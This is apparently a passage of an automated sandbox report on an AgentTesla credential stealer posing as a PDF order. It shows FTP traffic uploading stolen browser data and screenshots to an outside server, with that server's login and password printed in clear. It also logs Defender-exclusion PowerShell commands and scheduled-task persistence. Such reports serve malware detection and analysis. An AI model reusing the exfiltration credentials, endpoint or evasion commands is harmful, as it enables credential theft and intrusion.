                              Sep 25, 2024 14:42:49.474122047 CEST  55430  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:42:49.805684090 CEST  21  55430  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,237,107)
                              Sep 25, 2024 14:42:49.817501068 CEST  55430  21  192.168.2.9  110.4.45.197  STOR CO_Chrome_Default.txt_user-878411_2024_09_25_14_51_24.txt
                              Sep 25, 2024 14:42:50.657113075 CEST  21  55430  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:42:50.996732950 CEST  21  55430  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.356 seconds (measured here), 0.79 Kbytes per second
                              Sep 25, 2024 14:42:50.997369051 CEST  55430  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:42:51.330818892 CEST  21  55430  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,235,45)
                              Sep 25, 2024 14:42:51.336488008 CEST  55430  21  192.168.2.9  110.4.45.197  STOR CO_Edge Chromium_Default.txt_user-878411_2024_09_25_16_50_22.txt
                              Sep 25, 2024 14:42:52.186347008 CEST  21  55430  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:42:52.600034952 CEST  21  55430  110.4.45.197  192.168.2.9  226 File successfully transferred
                              Sep 25, 2024 14:42:52.600404978 CEST  55430  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:42:52.978665113 CEST  21  55430  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,198,13)
                              Sep 25, 2024 14:42:53.001554966 CEST  55430  21  192.168.2.9  110.4.45.197  STOR CO_Firefox_3nxxd8pi.default-release.txt_user-878411_2024_09_25_18_49_01.txt
                              Sep 25, 2024 14:42:53.906737089 CEST  21  55430  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:42:54.273318052 CEST  21  55430  110.4.45.197  192.168.2.9  226 File successfully transferred
                              Sep 25, 2024 14:44:24.828048944 CEST  21  65029  110.4.45.197  192.168.2.9  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220-You are user number 18 of 50 allowed.
                              220-Local time is now 20:44. Server port: 21.
                              220-This is a private system - No anonymous login
                              220-IPv6 connections are also welcome on this server.
                              220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:44:24.831254959 CEST  65029  21  192.168.2.9  110.4.45.197  USER origin@haliza.com.my
                              Sep 25, 2024 14:44:25.193777084 CEST  21  65029  110.4.45.197  192.168.2.9  331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:44:25.199153900 CEST  65029  21  192.168.2.9  110.4.45.197  PASS JesusChrist007$
                              Sep 25, 2024 14:44:25.588510990 CEST  21  65029  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:44:26.016300917 CEST  21  65029  110.4.45.197  192.168.2.9  504 Unknown command
                              Sep 25, 2024 14:44:26.016527891 CEST  65029  21  192.168.2.9  110.4.45.197  PWD
                              Sep 25, 2024 14:44:26.393462896 CEST  21  65029  110.4.45.197  192.168.2.9  257 "/" is your current location
                              Sep 25, 2024 14:44:26.395428896 CEST  65029  21  192.168.2.9  110.4.45.197  TYPE I
                              Sep 25, 2024 14:44:26.607925892 CEST  21  65030  110.4.45.197  192.168.2.9  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220-You are user number 19 of 50 allowed.
                              220-Local time is now 20:44. Server port: 21.
                              220-This is a private system - No anonymous login
                              220-IPv6 connections are also welcome on this server.
                              220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:44:26.611191988 CEST  65030  21  192.168.2.9  110.4.45.197  USER origin@haliza.com.my
                              Sep 25, 2024 14:44:26.777072906 CEST  21  65029  110.4.45.197  192.168.2.9  200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:44:26.777359962 CEST  65029  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:44:27.000193119 CEST  21  65030  110.4.45.197  192.168.2.9  331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:44:27.000380993 CEST  65030  21  192.168.2.9  110.4.45.197  PASS JesusChrist007$
                              Sep 25, 2024 14:44:27.156686068 CEST  21  65029  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,200,37)
                              Sep 25, 2024 14:44:27.169186115 CEST  65029  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2024_10_27_13_24_39.jpeg
                              Sep 25, 2024 14:44:27.466305971 CEST  21  65030  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:44:27.876199961 CEST  21  65030  110.4.45.197  192.168.2.9  504 Unknown command
                              Sep 25, 2024 14:44:27.876458883 CEST  65030  21  192.168.2.9  110.4.45.197  PWD
                              Sep 25, 2024 14:44:28.077284098 CEST  21  65030  110.4.45.197  192.168.2.9  504 Unknown command
                              Sep 25, 2024 14:44:28.106301069 CEST  21  65029  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:44:28.407121897 CEST  21  65030  110.4.45.197  192.168.2.9  257 "/" is your current location
                              Sep 25, 2024 14:44:28.407294989 CEST  65030  21  192.168.2.9  110.4.45.197  TYPE I
                              Sep 25, 2024 14:44:28.742332935 CEST  21  65030  110.4.45.197  192.168.2.9  200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:44:28.745111942 CEST  65030  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:44:28.917994022 CEST  21  65029  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.811 seconds (measured here), 91.01 Kbytes per second
                              Sep 25, 2024 14:44:29.085597038 CEST  21  65030  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,249,65)
                              Sep 25, 2024 14:44:29.093226910 CEST  65030  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2024_10_16_12_49_55.jpeg
                              Sep 25, 2024 14:44:30.056008101 CEST  21  65030  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:44:31.057775021 CEST  21  65030  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 1.001 seconds (measured here), 73.73 Kbytes per second
                              Sep 25, 2024 14:44:32.194961071 CEST  65029  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:44:32.538887978 CEST  21  65029  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,231,190)
                              Sep 25, 2024 14:44:32.547243118 CEST  65029  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2024_11_06_15_11_41.jpeg
                              Sep 25, 2024 14:44:33.451342106 CEST  21  65029  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:44:34.383814096 CEST  21  65029  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.932 seconds (measured here), 79.19 Kbytes per second
                              Sep 25, 2024 14:45:22.031651020 CEST  21  65040  110.4.45.197  192.168.2.9  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220-You are user number 17 of 50 allowed.
                              220-Local time is now 20:45. Server port: 21.
                              220-This is a private system - No anonymous login
                              220-IPv6 connections are also welcome on this server.
                              220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:45:22.031836033 CEST  65040  21  192.168.2.9  110.4.45.197  USER origin@haliza.com.my
                              Sep 25, 2024 14:45:22.031975031 CEST  21  65040  110.4.45.197  192.168.2.9  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220-You are user number 17 of 50 allowed.
                              220-Local time is now 20:45. Server port: 21.
                              220-This is a private system - No anonymous login
                              220-IPv6 connections are also welcome on this server.
                              220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:45:22.032416105 CEST  21  65040  110.4.45.197  192.168.2.9  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220-You are user number 17 of 50 allowed.
                              220-Local time is now 20:45. Server port: 21.
                              220-This is a private system - No anonymous login
                              220-IPv6 connections are also welcome on this server.
                              220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:45:22.420850992 CEST  21  65040  110.4.45.197  192.168.2.9  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220-You are user number 17 of 50 allowed.
                              220-Local time is now 20:45. Server port: 21.
                              220-This is a private system - No anonymous login
                              220-IPv6 connections are also welcome on this server.
                              220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:45:22.421000957 CEST  65040  21  192.168.2.9  110.4.45.197  USER origin@haliza.com.my
                              Sep 25, 2024 14:45:22.746551991 CEST  21  65040  110.4.45.197  192.168.2.9  331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:45:22.747558117 CEST  65040  21  192.168.2.9  110.4.45.197  PASS JesusChrist007$
                              Sep 25, 2024 14:45:23.947084904 CEST  21  65040  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:45:23.947805882 CEST  21  65040  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:45:23.948149920 CEST  21  65040  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:45:24.988107920 CEST  21  65040  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:45:24.989223003 CEST  21  65040  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:45:25.317061901 CEST  21  65040  110.4.45.197  192.168.2.9  504 Unknown command
                              Sep 25, 2024 14:45:25.317339897 CEST  65040  21  192.168.2.9  110.4.45.197  PWD
                              Sep 25, 2024 14:45:26.487792969 CEST  21  65040  110.4.45.197  192.168.2.9  257 "/" is your current location
                              Sep 25, 2024 14:45:26.488765955 CEST  21  65040  110.4.45.197  192.168.2.9  257 "/" is your current location
                              Sep 25, 2024 14:45:26.488816023 CEST  65040  21  192.168.2.9  110.4.45.197  TYPE I
                              Sep 25, 2024 14:45:26.488945961 CEST  21  65040  110.4.45.197  192.168.2.9  257 "/" is your current location
                              Sep 25, 2024 14:45:26.720679998 CEST  21  65040  110.4.45.197  192.168.2.9  257 "/" is your current location
                              Sep 25, 2024 14:45:27.044569969 CEST  21  65040  110.4.45.197  192.168.2.9  200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:45:27.045316935 CEST  65040  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:45:28.273814917 CEST  21  65040  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,212,238)
                              Sep 25, 2024 14:45:28.274068117 CEST  21  65040  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,212,238)
                              Sep 25, 2024 14:45:28.274665117 CEST  21  65040  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,212,238)
                              Sep 25, 2024 14:45:28.275059938 CEST  21  65040  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,212,238)
                              Sep 25, 2024 14:45:28.299405098 CEST  65040  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2024_11_16_06_41_22.jpeg
                              Sep 25, 2024 14:45:29.132098913 CEST  21  65040  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:45:29.942749023 CEST  21  65040  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.811 seconds (measured here), 91.04 Kbytes per second
                              Sep 25, 2024 14:45:30.982853889 CEST  21  65040  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.811 seconds (measured here), 91.04 Kbytes per second
                              Sep 25, 2024 14:45:30.983236074 CEST  21  65040  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.811 seconds (measured here), 91.04 Kbytes per second
                              Sep 25, 2024 14:45:30.983546019 CEST  21  65040  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.811 seconds (measured here), 91.04 Kbytes per second
                              Sep 25, 2024 14:45:59.895040035 CEST  21  65045  110.4.45.197  192.168.2.9  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                              220-You are user number 19 of 50 allowed.
                              220-Local time is now 20:46. Server port: 21.
                              220-This is a private system - No anonymous login
                              220-IPv6 connections are also welcome on this server.
                              220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:45:59.895211935 CEST  65045  21  192.168.2.9  110.4.45.197  USER origin@haliza.com.my
                              Sep 25, 2024 14:46:00.261992931 CEST  21  65045  110.4.45.197  192.168.2.9  331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:46:00.263067961 CEST  65045  21  192.168.2.9  110.4.45.197  PASS JesusChrist007$
                              Sep 25, 2024 14:46:00.671087027 CEST  21  65045  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:46:01.057591915 CEST  21  65045  110.4.45.197  192.168.2.9  504 Unknown command
                              Sep 25, 2024 14:46:01.058243990 CEST  65045  21  192.168.2.9  110.4.45.197  PWD
                              Sep 25, 2024 14:46:01.437719107 CEST  21  65045  110.4.45.197  192.168.2.9  257 "/" is your current location
                              Sep 25, 2024 14:46:01.437848091 CEST  65045  21  192.168.2.9  110.4.45.197  TYPE I
                              Sep 25, 2024 14:46:01.818774939 CEST  21  65045  110.4.45.197  192.168.2.9  200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:46:01.818973064 CEST  65045  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:46:02.210742950 CEST  21  65045  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,230,98)
                              Sep 25, 2024 14:46:02.216464043 CEST  65045  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2024_12_22_10_43_37.jpeg
                              Sep 25, 2024 14:46:03.095990896 CEST  21  65045  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:46:04.061877012 CEST  21  65045  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.973 seconds (measured here), 75.81 Kbytes per second
                              Sep 25, 2024 14:46:05.003916979 CEST  65045  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:46:05.407233953 CEST  21  65045  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,221,244)
                              Sep 25, 2024 14:46:05.418234110 CEST  65045  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2024_12_27_04_46_06.jpeg
                              Sep 25, 2024 14:46:06.289006948 CEST  21  65045  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:46:07.118069887 CEST  21  65045  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.823 seconds (measured here), 89.68 Kbytes per second
                              Sep 25, 2024 14:46:09.978199005 CEST  65045  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:46:10.707081079 CEST  21  65045  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,206,115)
                              Sep 25, 2024 14:46:10.735522032 CEST  65045  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2025_01_02_12_40_20.jpeg
                              Sep 25, 2024 14:46:11.621846914 CEST  21  65045  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:46:12.597202063 CEST  21  65045  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.815 seconds (measured here), 90.55 Kbytes per second
                              Sep 25, 2024 14:46:13.977505922 CEST  65045  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:46:14.397054911 CEST  21  65045  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,234,158)
                              Sep 25, 2024 14:46:14.402879953 CEST  65045  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2025_01_07_17_07_28.jpeg
                              Sep 25, 2024 14:46:15.331830978 CEST  21  65045  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:46:16.296406031 CEST  21  65045  110.4.45.197  192.168.2.9  226-File successfully transferred
                              226 0.963 seconds (measured here), 76.61 Kbytes per second
                              Sep 25, 2024 14:46:33.817956924 CEST  65040  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:46:34.410547972 CEST  65045  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:46:34.447510958 CEST  21  65040  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,225,87)
                              Sep 25, 2024 14:46:34.447932959 CEST  21  65040  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,225,87)
                              Sep 25, 2024 14:46:34.453856945 CEST  65040  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2024_09_25_08_46_32.jpeg
                              Sep 25, 2024 14:46:34.841181993 CEST  21  65045  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,198,164)
                              Sep 25, 2024 14:46:34.849772930 CEST  65045  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2024_09_25_08_46_33.jpeg
                              Sep 25, 2024 14:46:35.398848057 CEST  21  65040  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:46:35.744278908 CEST  21  65045  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:46:35.834079981 CEST  21  65051  110.4.45.197  192.168.2.9  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                  220-You are user number 18 of 50 allowed.
                                  220-Local time is now 20:46. Server port: 21.
                                  220-This is a private system - No anonymous login
                                  220-IPv6 connections are also welcome on this server.
                                  220 You will be disconnected after 15 minutes of inactivity.
                              Sep 25, 2024 14:46:35.834309101 CEST  65051  21  192.168.2.9  110.4.45.197  USER origin@haliza.com.my
                              Sep 25, 2024 14:46:36.221298933 CEST  21  65051  110.4.45.197  192.168.2.9  331 User origin@haliza.com.my OK. Password required
                              Sep 25, 2024 14:46:36.221535921 CEST  65051  21  192.168.2.9  110.4.45.197  PASS JesusChrist007$
                              Sep 25, 2024 14:46:36.313978910 CEST  21  65040  110.4.45.197  192.168.2.9  226-File successfully transferred
                                  226 0.925 seconds (measured here), 79.78 Kbytes per second
                              Sep 25, 2024 14:46:36.657290936 CEST  21  65051  110.4.45.197  192.168.2.9  230 OK. Current restricted directory is /
                              Sep 25, 2024 14:46:36.697979927 CEST  21  65045  110.4.45.197  192.168.2.9  226-File successfully transferred
                                  226 0.954 seconds (measured here), 77.60 Kbytes per second
                              Sep 25, 2024 14:46:37.054893970 CEST  21  65051  110.4.45.197  192.168.2.9  504 Unknown command
                              Sep 25, 2024 14:46:37.055047989 CEST  65051  21  192.168.2.9  110.4.45.197  PWD
                              Sep 25, 2024 14:46:37.457376003 CEST  21  65051  110.4.45.197  192.168.2.9  257 "/" is your current location
                              Sep 25, 2024 14:46:37.457590103 CEST  65051  21  192.168.2.9  110.4.45.197  TYPE I
                              Sep 25, 2024 14:46:37.933031082 CEST  21  65051  110.4.45.197  192.168.2.9  200 TYPE is now 8-bit binary
                              Sep 25, 2024 14:46:37.933207035 CEST  65051  21  192.168.2.9  110.4.45.197  PASV
                              Sep 25, 2024 14:46:38.291529894 CEST  21  65051  110.4.45.197  192.168.2.9  227 Entering Passive Mode (110,4,45,197,200,170)
                              Sep 25, 2024 14:46:38.297013998 CEST  65051  21  192.168.2.9  110.4.45.197  STOR SC_user-878411_2024_09_25_08_46_32.jpeg
                              Sep 25, 2024 14:46:39.207407951 CEST  21  65051  110.4.45.197  192.168.2.9  150 Accepted data connection
                              Sep 25, 2024 14:46:40.157882929 CEST  21  65051  110.4.45.197  192.168.2.9  226-File successfully transferred
                                  226 0.940 seconds (measured here), 78.47 Kbytes per second


                              Target ID:0
                              Start time:08:42:18
                              Start date:25/09/2024
                              Path:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                              Imagebase:0x5d0000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:08:42:19
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                              Imagebase:0x900000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:08:42:19
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:08:42:19
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                              Imagebase:0x900000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:08:42:20
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:08:42:20
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp"
                              Imagebase:0xc00000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:08:42:20
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:08:42:20
                              Start date:25/09/2024
                              Path:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                              Imagebase:0x1a0000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:10
                              Start time:08:42:20
                              Start date:25/09/2024
                              Path:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                              Imagebase:0x450000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.3860883657.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.3860883657.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Target ID:11
                              Start time:08:42:21
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              Imagebase:0xb40000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:12
                              Start time:08:42:23
                              Start date:25/09/2024
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff72d8c0000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:13
                              Start time:08:42:26
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp"
                              Imagebase:0xc00000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:14
                              Start time:08:42:26
                              Start date:25/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff70f010000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:15
                              Start time:08:42:26
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                              Imagebase:0xff0000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3860059633.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3860059633.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.3860059633.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:false

                              Target ID:16
                              Start time:08:42:31
                              Start date:25/09/2024
                              Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                              Imagebase:0xdf0000
                              File size:685'568 bytes
                              MD5 hash:5D5B5ECC06B9058D0EC3199ED8617CFE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:17
                              Start time:08:42:33
                              Start date:25/09/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp675.tmp"
                              Imagebase:0xc00000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:18
                              Start time:08:42:33
                              Start date:25/09/2024
